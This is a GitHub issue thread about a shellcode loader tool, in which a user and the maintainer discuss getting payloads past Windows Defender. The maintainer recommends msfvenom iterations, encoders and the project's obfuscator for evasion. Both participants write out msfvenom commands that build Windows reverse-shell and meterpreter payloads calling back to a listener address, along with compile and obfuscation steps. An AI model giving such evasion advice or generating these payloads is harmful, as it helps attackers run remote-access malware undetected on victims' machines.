### ISSUE TITLE
shellcode

### ISSUE THREAD

**Issue by sec13b** [vatsalgupta67/Shellzor#1]
did you have the AV active , when you run windows_executor..exe shellcode.bin 0x2f
bcz after i drag from kali image the shellcode.bin , windows av delete instant

**Comment by vatsalgupta67** [comment]
Hi,

Thanks for reaching out!


If your shellcode file is detectable then it's the problem only!

You can use msfvenom to completely avoid detection of your shellcode file by using iterations and other things as well you feel comfortable. I personally used iterations & it didn't detected at all!

.bin file have lot of advantages and you can easily able to evade things. In the context of exe and all. It's not that easy that's why I prefer. Bin.

Windows_executor.exe is safe and not detectable in general. But if your shellcode.bin file is default simple, then because of this the windows defender is detecting it. You have to modify your shellcode file & add iterations etc. then, it'll work!


In general, while making it. My system & windows defender were up. It should not be the problem & even now, it's working fine!


Thank you!

**Comment by sec13b** [comment]
My mistake, I didnt use the obfuscator .

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.10.123 LPORT=4444 -f raw -o payload.bin
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
x86_64-w64-mingw32-gcc -c obfuscator.c -o obfuscator.exe 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
it helps if I use 
-masm=intel
 -Wall

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 .\obfuscator.exe payload.bin 0*2f
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

**Comment by vatsalgupta67** [comment]
Hi,


Yeah, it's recommended to use obfuscator.exe as for only that i can guarantee.

Binary by itself is just fine. As I said, everything depends on your shellcode.bin file. If it's getting detected then it'll not work as Portable Executable ( PE) you are using is not in my hand to control. If your PE us good & good iterations are there, it'll be bypassed. I personally used msfvenom to generate shellcode & .bin file with iterations always work. 


But if you know shellcode development, it'll make your things more easy. But without it, if you use msfvenom properly. It'll definately work)


I hope it helped you. 

Thanks & wishing you a great day ahead 🙏

**Comment by sec13b** [comment]
can you give me a example of msfvenom  have you use for your shellcode.bin file
no offense,
thank you

**Comment by vatsalgupta67** [comment]
Example - msfvenom -p windows/x64/shell_reverse_tcp LHOST=< IP > LPORT=< PORT > -f raw -i < iterations as you want for evasion > -e < encoder you want to use > -o shell.bin 



Here in some situations it's better not to use msfvenom's encoder. Especially in this state where you have obfuscator.exe. But in general you can use encoders of msfvenom. Only, in this situation I can't guarantee that it'll work with in-built encoder!

But iterations will work and you can iterate multiple times as you want!


Thankyou!

**Comment by sec13b** [comment]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.10.123 LPORT=4444 -f raw -i  10  -e  x86/shikata_ga_nai  -o payload.bin
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



I will try .


thank you a lot
